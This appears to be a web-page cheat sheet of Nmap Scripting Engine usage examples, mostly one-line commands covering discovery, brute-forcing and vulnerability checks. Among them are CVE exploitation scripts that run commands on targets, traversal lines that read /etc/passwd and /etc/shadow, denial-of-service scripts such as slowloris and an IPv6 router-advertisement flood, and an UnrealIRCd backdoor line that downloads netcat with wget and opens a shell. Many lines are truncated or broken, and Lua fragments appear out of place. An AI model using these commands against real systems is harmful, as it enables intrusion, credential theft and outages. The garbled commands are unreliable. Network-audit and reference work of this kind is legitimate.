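Some really useful NSE (Nmap Scripting Engine) scripts, listed by their usage examples.
Use keyword search (Ctrl+F) to find items related to what you need, such as smb, nse, or even geolocation of IP addresses with Google Maps.
Note on formatting: the leading “—” on each line appears to be the Lua comment marker `--` from the script headers. Inside the commands, “–script” and “–script-args” must be typed as `--script` and `--script-args`, and curly quotes as straight quotes. Some entries stop short (for example a bare `-p 8009`), apparently because angle-bracket placeholders such as the target, and the text after them, were lost when the page was published.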
— nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p
— nmap -p 548 –script afp-brute
— nmap -sS -sV -p 548 –script=afp-ls target
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -p 8009
— nmap -Pn -sU -sV –script allseeingeye-info -p
— nmap –script amqp-info -p5672
— nmap –script asn-query [–script-args dns=
— nmap -sU –script backorifice-brute
— nmap -p 8333 –script bitcoin-getaddr
— nmap -p 8333 –script bitcoin-info
— nmap -p 8332 –script bitcoinrpc-info –script-args creds.global=
— nmap –script bittorrent-discovery –script-args newtargets,bittorrent-discovery.torrent=
— nmap -sU -p 8611,8612 –script bjnp-discover
— nmap –script broadcast-ataoe-discover -e
— nmap –script=broadcast-avahi-dos
— nmap –script broadcast-bjnp-discover
— nmap –script db2-discover
— nmap -6 –script broadcast-dhcp6-discover
— nmap –script broadcast-dhcp-discover
— nmap –script=broadcast-dns-service-discovery
— nmap –script=broadcast-dropbox-listener
— nmap –script=broadcast-dropbox-listener –script-args=newtargets -Pn
— nmap –script=broadcast-eigrp-discovery
— nmap –script=broadcast-eigrp-discovery
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-igmp-discovery -e wlan0
— nmap –script broadcast-igmp-discovery
— nmap –script broadcast-listener
— nmap –script broadcast-listener -e eth0
— nmap –script broadcast-ms-sql-discover
— nmap –script broadcast-ms-sql-discover,ms-sql-info –script-args=newtargets
— nmap –script=broadcast-netbios-master-browser
— nmap –script=broadcast-ospf2-discover
— nmap –script=broadcast-ospf2-discover -e wlan0
— nmap –script broadcast-pc-anywhere
— nmap –script broadcast-pc-duo
— nmap –script broadcast-pim-discovery
— nmap –script broadcast-pim-discovery -e eth1
— nmap –script broadcast-pppoe-discover
— nmap –script broadcast-rip-discover
— nmap –script broadcast-ripng-discover
— nmap -e eth0 –script broadcast-sonicwall-discover
— nmap –script broadcast-sybase-asa-discover
— nmap –script broadcast-tellstick-discover
— nmap –script broadcast-versant-locate
— nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC='00:12:34:56:78:9A'
— nmap –script broadcast-wpad-discover
— nmap –script broadcast-wsdd-discover
— nmap –script broadcast-xdmcp-discover
— nmap -p 9160
— nmap -p 9160
— nmap –script=cics-enum -p 23
— nmap –script=cics-enum –script-args=idlist=default_cics.txt,
— nmap –script=cics-info -p 23
— nmap –script=cics-info –script-args cics-info.commands=’logon applid(coolcics)’,
— nmap –script=cics-user-brute -p 23
— nmap –script=cics-user-brute –script-args userdb=users.txt,
— nmap –script=cics-user-enum -p 23
— nmap –script=cics-user-enum –script-args userdb=users.txt,
— nmap –script=citrix-brute-xml –script-args=userdb=
— nmap –script=citrix-enum-apps-xml -p 80,443,8080
— nmap –script=citrix-enum-servers-xml -p 80,443,8080
— nmap -sV –script clamav-exec
— nmap –script clamav-exec –script-args cmd=’scan’,scandb=’files.txt’
— nmap –script clamav-exec –script-args cmd=’shutdown’
— nmap -p 5984 –script “couchdb-databases.nse”
— nmap -p 5984 –script “couchdb-stats.nse”
— nmap -p 631
— nmap -p 631
— nmap -p 2401 –script cvs-brute
— nmap -p 2401 –script cvs-brute-repository
— nmap –script deluge-rpc-brute -p 58846
— nmap -sU -p 67 –script=dhcp-discover
— nmap -p 2628
— nmap -p 3632
— nmap –script dns-blacklist –script-args=’dns-blacklist.ip=
— nmap -sn
— nmap –script dns-brute –script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
— nmap –script dns-brute www.foo.com
— nmap -sU -p 53 –script dns-cache-snoop.nse –script-args ‘dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}’
— nmap -sn -Pn ns1.example.com –script dns-check-zone –script-args=’dns-check-zone.domain=example.com’
— nmap -sU -p 53 –script dns-client-subnet-scan –script-args \
— nmap –script dns-client-subnet-scan –script-args \
— nmap -sU –script dns-fuzz –script-args timelimit=2h
— nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'
— nmap -sU -p 53
— nmap -sSU -p 53 –script dns-nsec-enum –script-args dns-nsec-enum.domains=example.com
— nmap -sSU -p 53 –script dns-nsid
— nmap -sU -p 53 –script=dns-random-srcport
— nmap -sU -p 53 –script=dns-random-txid
— nmap -sU -p 53 –script=dns-recursion
— nmap –script=dns-service-discovery -p 5353
— nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"
— nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1
— nmap -sn -PN –script=dns-zeustracker
— nmap –script dns-zone-transfer.nse \
— nmap –script domcon-brute -p 2050
— nmap -p 2050
— nmap –script domino-enum-users -p 1352
— nmap –script dpap-brute -p 8770
— nmap -p 50000 –script drda-brute
— sudo nmap -PN -p445,443 –script duplicates,nbstat,ssl-cert
— nmap -e interface --script eap-info [--script-args="eap-info.identity=0-user,eap-info.scan={13,50}"]
— nmap –script enip-info -sU -p 44818
— nmap -p 4369 –script epmd-info
— nmap -p 3031
— nmap -sn -Pn –script fcrdns
— nmap -sV –script fingerprint-strings
— nmap –script=firewalk –traceroute
— nmap –script=firewalk –traceroute –script-args=firewalk.max-retries=1
— nmap –script=firewalk –traceroute –script-args=firewalk.probe-timeout=400ms
— nmap –script=firewalk –traceroute –script-args=firewalk.max-probed-ports=7
— nmap –script firewall-bypass
— nmap –script firewall-bypass –script-args firewall-bypass.helper=”ftp”, firewall-bypass.targetport=22
— nmap –script flume-master-info -p 35871 host
— nmap –script fox-info.nse -p 1911
— nmap -sU -p 2302 –script=freelancer-info
— nmap –script ftp-brute -p 21
— nmap –script ftp-proftpd-backdoor -p 21
— nmap –script ftp-vsftpd-backdoor -p 21
— nmap –script ftp-vuln-cve2010-4221 -p 21
— nmap –script ganglia-info –script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p
— nmap -p 19150
— nmap -p 70 –script gopher-ls –script-args gopher-ls.maxfiles=100
— nmap -p 2947
— nmap –script hadoop-datanode-info.nse -p 50075 host
— nmap –script hadoop-jobtracker-info [–script-args=hadoop-jobtracker-info.userinfo] -p 50030 host
— nmap –script hadoop-namenode-info -p 50070 host
— nmap –script hadoop-secondary-namenode-info -p 50090 host
— nmap –script hadoop-tasktracker-info -p 50060 host
— nmap –script hbase-master-info -p 60010 host
— nmap –script hbase-region-info -p 60030 host
— nmap –script hnap-info -p80,8080
— nmap –script hostmap-bfk –script-args hostmap-bfk.prefix=hostmap-
— nmap –script hostmap-crtsh –script-args ‘hostmap-crtsh.prefix=hostmap-‘
— nmap -sn –script hostmap-crtsh
— nmap –script hostmap-robtex -sn -Pn scanme.nmap.org
— nmap –script=http-affiliate-id.nse –script-args http-affiliate-id.url-path=/website
— nmap –script=http-apache-negotiation –script-args http-apache-negotiation.root=/root/
* https://github.com/michenriksen/nmap-scripts
— nmap -p 80 –script http-auth-finder
— nmap –script http-auth [–script-args http-auth.path=/login] -p80
— nmap -sV –script http-awstatstotals-exec.nse –script-args ‘http-awstatstotals-exec.cmd=”uname -a”, http-awstatstotals-exec.uri=/awstats/index.php’
— nmap -sV –script http-awstatstotals-exec.nse
— nmap -p80,8080 –script http-axis2-dir-traversal –script-args ‘http-axis2-dir-traversal.file=../../../../../../../etc/issue’
— nmap -p80 –script http-axis2-dir-traversal
— nmap –script=http-backup-finder
— nmap –script http-barracuda-dir-traversal –script-args http-max-cache-size=5000000 -p
— nmap -p
— nmap –script http-brute -p 80
— nmap -p80,443 –script http-cakephp-version
— nmap –script http-chrono
— nmap -p 443 –script http-cisco-anyconnect
— nmap –script=http-config-backup
— nmap -p 443 --script http-cookie-flags
— nmap -p 80 --script http-cors
— nmap -p80 –script http-default-accounts host/ip
— nmap -sV –script http-dlink-backdoor
— nmap –script http-domino-enum-passwords -p 80
— nmap –script=http-drupal-enum-users –script-args http-drupal-enum-users.root=”/path/”
— nmap –script http-exif-spider -p80,443
— nmap –script=http-favicon.nse \
— nmap –script http-fetch –script-args ‘paths={/robots.txt,/favicon.ico}’
— nmap –script http-fetch –script-args ‘paths=.html’
— nmap –script http-fetch –script-args ‘url=/images,paths={.jpg,.png,.gif}’
— nmap –script http-form-brute -p 80
— nmap –script http-form-fuzzer –script-args ‘http-form-fuzzer.targets={1={path=/},2={path=/register.html}}’ -p 80
— nmap
— nmap –script http-generator [–script-args http-generator.path=
— nmap -p80 www.example.com –script http-gitweb-projects-enum
— nmap -p80 –script http-google-malware
— nmap -p 80 www.example.com –script http-grep –script-args=’match=”[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?”,breakonmatch’
— nmap -p 80 www.example.com –script http-grep –script-args ‘http-grep.builtins ={“mastercard”, “discover”}, http-grep.url=”example.html”‘
— nmap -sn -Pn –script http-icloud-findmyiphone –script-args=’username=
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=
— nmap -sn -Pn –script http-icloud-sendmsg –script-args=”username=
— nmap -p80 –script http-iis-short-name-brute
— nmap –script http-iis-webdav-vuln -p80,8080
return nmap.verbosity() > 0 and “WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add –script-args=webdavfolder=
— nmap -sV –script http-joomla-brute
— nmap -sV –script http-joomla-brute
— nmap -p 80 –script http-jsonp-detection
— nmap -p80 –script http-litespeed-sourcecode-download –script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
— nmap -p8088 –script http-litespeed-sourcecode-download
— nmap -n -p 80 –script http-ls test-debit.free.fr
— nmap -p80 –script http-majordomo2-dir-traversal
— nmap –script http-methods
— nmap –script http-methods –script-args http-methods.url-path=’/website’
— nmap -p 80 –script http-ntlm-info –script-args http-ntlm-info.root=/root/
— nmap –script http-open-proxy.nse \
— nmap –script=http-open-redirect
— nmap –script http-passwd –script-args http-passwd.root=/test/
— nmap -p80 –script http-phpmyadmin-dir-traversal –script-args=”dir=’/pma/’,file=’../../../../../../../../etc/passwd’,outfile=’passwd.txt'”
— nmap -p80 –script http-phpmyadmin-dir-traversal
— nmap –script=http-phpself-xss -p80
— nmap -sV --script http-phpself-xss
— nmap –script http-proxy-brute -p 8080
local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ‘.url’) or ‘http://scanme.nmap.org/’
— nmap -p 80
— nmap –script http-qnap-nas-info -p
— nmap –script http-rfi-spider -p80
— nmap –script http-robtex-reverse-ip –script-args http-robtex-reverse-ip.host=’
— nmap –script http-robtex-shared-ns
— nmap -p
— nmap -sV -p- –script http-shellshock
— nmap -sV -p- –script http-shellshock –script-args uri=/cgi-bin/bin,cmd=ls
— nmap –script http-sitemap-generator -p 80
— nmap –script http-slowloris-check
— nmap –script http-slowloris –max-parallelism 400
slowloris:set_timeout(math.min(200 * 1000, end_time – nmap.clock_ms())) — Set a long timeout so our socket doesn’t timeout while it’s waiting. At the same time left for script execution is maximum limit.
— nmap –script http-trace -d
— nmap –script=http-traceroute
— nmap –script=http-unsafe-output-escaping
— nmap –script http-vhosts -p 80,8080,443
— nmap –script http-virustotal –script-args=’http-virustotal.apikey=”
— nmap -p 54340 –script http-vlcstreamer-ls
— nmap –script http-vmware-path-vuln -p80,443,8222,8333
— nmap -sV –script http-vuln-cve2006-3392
— nmap -p80 –script http-vuln-cve2006-3392 –script-args http-vuln-cve2006-3392.file=/etc/shadow
— nmap –script=http-vuln-cve2009-3960 –script-args http-http-vuln-cve2009-3960.root=”/root/”
— nmap –script=http-vuln-cve2010-0738 –script-args ‘http-vuln-cve2010-0738.paths={/path1/,/path2/}’
— nmap –script http-vuln-cve2010-2861
— nmap –script http-vuln-cve2011-3192.nse [–script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443
— nmap –script http-vuln-cve2011-3368
— nmap -sV –script http-vuln-cve2012-1823
— nmap -p80 –script http-vuln-cve2012-1823 –script-args http-vuln-cve2012-1823.uri=/test.php
— nmap -sV –script http-vuln-cve2013-0156
— nmap -sV –script http-vuln-cve2013-0156 –script-args uri=”/test/”
— nmap -sV –script http-vuln-cve2013-7091
— nmap -p80 –script http-vuln-cve2013-7091 –script-args http-vuln-cve2013-7091=/ZimBra
— nmap -p 443 –script http-vuln-cve2014-2126
— nmap -p 443 –script http-vuln-cve2014-2127
— nmap -p 443 –script http-vuln-cve2014-2128
— nmap -p 443 –script http-vuln-cve2014-2129
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.cmd=”uname -a”,http-vuln-cve2014-3704.uri=”/drupal”
— nmap –script http-vuln-cve2014-3704 –script-args http-vuln-cve2014-3704.uri=”/drupal”,http-vuln-cve2014-3704.cleanup=false
— nmap –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=”whoami”,http-vuln-cve2014-8877.uri=”/wordpress”
— nmap –script http-vuln-cve2014-8877
— nmap –script=http-vuln-cve2015-1427 –script-args command= ‘ls’
— nmap –script http-vuln-cve2017-1001000 –script-args http-vuln-cve2017-1001000=”uri”
— nmap –script http-vuln-cve2017-1001000
— nmap -p
— nmap -p 16992 –script http-vuln-cve2017-5689
— nmap
— nmap -sV –script http-vuln-wnr1000-creds
— nmap -p80 –script http-waf-detect
— nmap -p80 –script http-waf-detect –script-args=”http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php” www.modsecurity.org
— nmap –script=http-waf-fingerprint
— nmap –script=http-waf-fingerprint –script-args http-waf-fingerprint.intensive=1
— nmap –script http-webdav-scan -p80,8080
— nmap -sV –script http-wordpress-brute
— nmap -sV –script http-wordpress-brute
— nmap -p80 –script http-wordpress-users
— nmap -sV –script http-wordpress-users –script-args limit=50
— nmap -sU -p 4569
— nmap -p 1344
— nmap -sU -p 500 –script ike-version
— nmap -p 143,993 –script imap-brute
— nmap -p 143,993 –script imap-ntlm-info
— nmap –script informix-brute -p 9088
— nmap -p 9088
— nmap -p 9088
— sudo nmap -sn
— nmap –script ip-geolocation-geoplugin
— nmap –script ip-geolocation-ipinfodb
— nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-bing --script-args ip-geolocation-map-bing.api_key=[redacted],ip-geolocation-map-bing.map_path=map.png
— nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-google --script-args ip-geolocation-map-google.api_key=[redacted],ip-geolocation-map-google.map_path=map.png
— nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml
— nmap –script ip-geolocation-maxmind
— nmap –script ip-https-discover
— nmap –script ipidseq [–script-args probeport=port] target
— nmap -sU –script ipmi-brute -p 623
— nmap -sU –script ipmi-cipher-zero -p 623
— nmap -sU –script ipmi-version -p 623
— nmap --script=ipv6-multicast-mld-list
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. ".interface") or nmap.get_interface()
— nmap -6 –script ipv6-ra-flood.nse
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=
— nmap -6 –script ipv6-ra-flood.nse –script-args ‘interface=
if not stdnse.get_script_args(SCRIPT_NAME .. “.interface”) and not nmap.get_interface() then
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. “.interface”) or nmap.get_interface()
— nmap -p 6667 –script=irc-botnet-channels
— nmap -p 6667 –script=irc-botnet-channels –script-args ‘irc-botnet-channels.channels={chan1,chan2,chan3}’
— nmap –script irc-brute -p 6667
— nmap –script irc-sasl-brute -p 6667
$ nmap -d -p6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh’
— nmap -p 3205
— nmap –script knx-gateway-discover -e eth0
— nmap -p 88 –script krb5-enum-users –script-args krb5-enum-users.realm=’test’
— nmap -p 389 –script ldap-brute –script-args ldap.base='”cn=users,dc=cqure,dc=net”‘
— nmap -p 636 –script ldap-novell-getpass –script-args \
— nmap -p 389 –script ldap-rootdse
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -p 389 –script ldap-search –script-args ‘ldap.username=”cn=ldaptest,cn=users,dc=cqure,dc=net”,ldap.password=ldaptest,
— nmap -sU -p 9100 –script=lexmark-config
— nmap –script llmnr-resolve –script-args ‘llmnr-resolve.hostname=examplename’ -e wlan0
— nmap -e
— nmap –script lu-enum -p 23
— nmap –script lu-enum –script-args lulist=lus.txt,
— nmap -p 7210 –script maxdb-info